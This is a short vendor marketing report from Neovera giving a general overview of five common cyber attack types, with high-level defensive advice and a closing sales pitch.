NEOVERA SHORT REPORT
In this report we examine 5 of the most common cyber attack methods. With the growing number of cyber attacks, your best defense is education, awareness, and taking the necessary steps to protect your organization against these threats. Better knowledge means better protection when combined with comprehensive tools to defend your enterprise.
#1: Web-Borne Malware
Malware is part of the event chain in virtually every security incident. Malware, short for malicious software, is an umbrella term that refers to a variety of software that compromises the operation of a system by performing an unauthorized function or process. More specifically, web-borne malware creators use web-browsing add-ons as a medium for distributing malware and unwanted applications. The careless behavior of Internet users combined with targeted campaigns by attackers place companies at higher risk of web malware exposure. The user-centric approach that attackers use for malware distribution proves successful because many Internet users trust add-ons and view them as nonthreatening.
Many applications fail to inspect the data returned from a visit to a website. Malicious hackers, typically using Java Script, add malicious code to the webpage. When the unsuspecting user visits the infected webpage, the Java Script runs in the user’s browser and in most cases causes malware to be downloaded to the user’s PC.
According to the Verizon 2015 Data Breach Incident Report, five malware events occur every second. The “sinister seven” of malware are zbot, rerdom, zeroaccess, andromeda, expiro, asprox, gamaru, and sality.
#2: Spear Phishing
Phishing is the attempt to deceive individuals into providing sensitive information by masquerading as a trustworthy entity in an electronic communication. Spear Phishing comes in the form of an email that appears to be from an individual or business that you know. Instead, it’s from criminal hackers who want your credit card and bank account numbers, passwords, and the financial information on your PC. They thrive on familiarity and already know a little bit about you; therefore making it easier to trick you into assuming this is an authentic email.
Phishing is a favorite tactic of state-sponsored threat actors and criminal organizations, all with the intent of gaining an initial foothold into a network. In these state sponsored attacks, the user interaction is not about extracting information, but instead to establish themselves on user devices, set up camp, and continue their penetration inside the network.
Security against phishing is a numbers game. Even if a company blocks 99.99% of spam messages, some will still make it into your inbox. One click could compromise your network. According to research from Trend Micro, 91% of cyber attacks and the resulting data breach begin with a “spear phishing” email.
An effective way to minimize the phishing threat is with employee awareness and training, along with improved detection and response capabilities. Also, if your organization lacks the in-house expertise to build and maintain firewalls, then consider outsourcing to the experts. This can greatly reduce security risk while increasing operational efficiency.
#3: Clickjacking
Clickjacking is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer. A clickjacked page tricks a user into clicking on a concealed link on which the attackers have loaded a transparent layer. The user thinks that they are clicking visible buttons, but in reality they are performing actions on the hidden page. This presents a danger to the user and the network as the hacker can gain confidential information, credentials, and potentially install malware into the system.
An example of clickjacking is an attacker builds a website that has a button saying “click here to be entered into a drawing for a free MacBook.” However, on top of that web page, the attacker has loaded an iframe with your email account and positioned the “delete all messages” button directly over the “free MacBook” button. The victim tries to click on the “free MacBook” button but actually clicks on the user-invisible “delete all messages” button. The attacker has “hijacked” the user’s click for nefarious purposes.
To reduce the risk of Clickjacking:
- Evaluate and install browser plugins such as NoScript and NotScript, which prompt users to allow javascript actions on sites they visit, as well as specify trusted domains.
- Install and implement a strong email spam filter, and check it often. A clickjacking attack usually begins by tricking a user through email into visiting a malicious site.
- Web Application Firewalls (WAFs) will also prevent an interjection on a site and inputting code. Though worth it, these firewalls are expensive and take a lot of time to manage.
#4: Zero Day Attacks
A Zero-day attack is an attack on a Zero-day vulnerability, which – technically speaking – is a flaw in software or hardware that have not been patched or made public. If an attacker spots the vulnerability, they can write and implement malicious code while the vulnerability is still open and available. There is little time to find and fix the vulnerability, which gives hackers the advantage to wreak maximum havoc, hence “zero-day attack.”
It’s hard to protect yourself entirely from zero-day exploits but some preventative measures can help. Keeping up firewalls that actively meet the needs of your business and applications is the first step. The second step is deploying Intrusion Prevention Systems (IPS) that offer comprehensive monitoring for your network and system activities.
Ensure that your IPS includes:
- Network-level protection
- Application integrity checking
- Application protocol Request for Comment (RFC) validation
- Content validation and forensics capability
#5: DoS and DDoS
Denial of Service (DoS) – A Denial of Service attack is a malicious attempt to make a server or network unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet. There are two general forms of DoS attacks: those that crash services and those that flood services.
Rapid identification and response can prevent DoS attacks. DoS attacks need to be quickly and effectively identified by incoming traffic as malicious instead of an authentic spike in site traffic. If a DoS attack is registered then an effective response usually includes a scalable infrastructure to absorb the attack until it can be blocked.
Distributed Denial of Service (DDoS) – A Distributed Denial of Service (DDoS) attack is where the attack source is more than one – and often thousands – of unique IP addresses, making it harder to deflect the attacks and to pinpoint its source. The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to the system to legitimate users.
A specifically targeted DDoS attack is impossible to prevent, but you can take precautions to eliminate some of the damage. To understand how your organization would react to a DDoS attack, you should conduct regular drills/exercises to identify vulnerabilities, and perhaps add technology or eternal mitigation services to help maintain or restore services.
Using a cloud provider is useful, as they have built out massive amounts of network bandwidth and DDoS mitigation capacity at multiple sites that can take in any amount of network traffic thanks to its scalable nature. They comb through the traffic for you and only send “clean” traffic to your data center.
DDoS can be divided into three main categories:
- Volume Based Attacks – The attack’s goal is to flood the bandwidth of the attacked site. This is measured in bits per second (Bps).
- Protocol Attacks – This attack consumes actual server resources such as firewalls and load balancers. This is measured in Packets per second (Pps).
- Application Layer Attacks – These look like legitimate and innocent requests, but by targeting the application layer, their goal is to crash the web server. This is measured in Requests per second (Rps).
As the volume and sophistication of attack methods and data breaches increases, the question is not IF – it’s WHEN. According to the US Chamber of Commerce, one in five small businesses falls victim to hackers every year, and of those, about 60 percent go out of business within six months of the attack. Don’t wait until you’re a victim of a cyber attack. Take action now to protect your critical data.
For more information on cyber security monitoring, and to learn how Neovera can help you stay ahead of security threats, visit us at www.neovera.com/cybersecurity or contact us at sales@neovera.com. We provide continuous monitoring, enhanced intelligence, proactive prevention, early threat recognition, rapid response, and investigation of root causes to keep your enterprise safe.